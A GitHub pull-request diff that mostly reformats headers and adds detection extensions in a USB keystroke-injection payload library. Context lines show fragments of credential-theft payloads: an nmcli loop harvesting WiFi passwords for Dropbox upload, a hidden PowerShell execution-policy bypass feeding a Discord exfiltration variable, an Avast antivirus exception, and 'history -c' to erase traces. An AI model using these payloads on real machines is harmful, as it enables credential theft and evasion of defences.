Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Several improvements in payloads #477

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Several improvements in payloads #477

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
60 changes: 39 additions & 21 deletions payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,27 +1,53 @@

REM #######################################################
REM # |
REM # Title : Exfiltrate Wifi Passwords - Linux |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Credentials, Execution |
REM # Target : Linux |
REM # |
REM #######################################################
REM_BLOCK
#######################################################
# #
# Title : Exfiltrate Wifi Passwords - Linux #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration, Credentials, Execution #
# Target : Linux #
# #
#######################################################
END_REM

REM Requirements:
REM - Permissions
REM - Internet connection
REM - Dropbox Token

DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay

TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM

REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120

VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION

CTRL-ALT t
DELAY 2000


REM #### PREREQUISITES SECTION ####


REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
Expand All @@ -41,8 +67,6 @@ ENTER


REM #### ZIP SECTION ####


DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
Expand All @@ -61,8 +85,6 @@ ENTER


REM #### WiFi && ZIP SECTION ####


REM Get all WiFi data
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
ENTER
Expand All @@ -85,8 +107,6 @@ DELAY 3000


REM #### EXFILTRATE SECTION ####


REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
Expand All @@ -105,8 +125,6 @@ ENTER


REM #### REMOVE TRACES ####


DELAY 2000
STRING history -c
ENTER
Expand Down
43 changes: 42 additions & 1 deletion payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -10,8 +10,49 @@ REM # |
REM ###################################################################


EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.

USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM

REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7

$_OS = #NOT_WINDOWS

VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF

REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION

DELAY 2000
GUI r
DELAY 250
STRING powershell -w h -ep bypass $discord='
Expand Down
65 changes: 53 additions & 12 deletions payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,24 +1,65 @@
REM ########################################################
REM # |
REM # Title : Add An Exception To Avast Antivirus |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ########################################################

REM_BLOCK
########################################################
# #
# Title : Add An Exception To Avast Antivirus #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
########################################################
END_REM

REM Requirements:
REM - Avast installed and configured


REM Set the full-path that you want to set as exception
DEFINE FULL-PATH example/to/path

EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.

USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM

REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7

$_OS = #NOT_WINDOWS

VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF

REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION

REM Open Avast application
DELAY 2000
GUI
DELAY 1000
STRING avast
Expand Down
21 changes: 11 additions & 10 deletions payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,13 +1,14 @@
REM ##############################################
REM # |
REM # Title : Call Someone On An iPhone |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : iPhone |
REM # |
REM ##############################################

REM_BLOCK
##############################################
# |
# Title : Call Someone On An iPhone |
# Author : Aleff |
# Version : 1.0 |
# Category : Execution |
# Target : iPhone |
# |
##############################################
END_REM

REM Requirements:
REM - The phone must be unlocked
Expand Down
20 changes: 11 additions & 9 deletions payloads/library/execution/ChangeGitRemoteLink/payload.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,12 +1,14 @@
REM ###########################################
REM # |
REM # Title : Change Remote Git Link |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11/Linux |
REM # |
REM ###########################################
REM_BLOCK
###########################################
# #
# Title : Change Remote Git Link #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10-11/Linux #
# #
###########################################
END_REM

REM Requirements:
REM - Internet Connection
Expand Down
53 changes: 39 additions & 14 deletions payloads/library/execution/ChangeMacAddress_Linux/payload.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,25 +1,50 @@

REM ###########################################
REM # |
REM # Title : Change Linux MAC Address |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###########################################
REM_BLOCK
###########################################
# #
# Title : Change Linux MAC Address #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
###########################################
END_REM

REM Requirements:
REM - Permissions

DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay

TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM

REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120

VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION

CTRL-ALT t
DELAY 2000


REM #### PERMISSIONS SECTION ####


REM You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example

Expand Down
Loading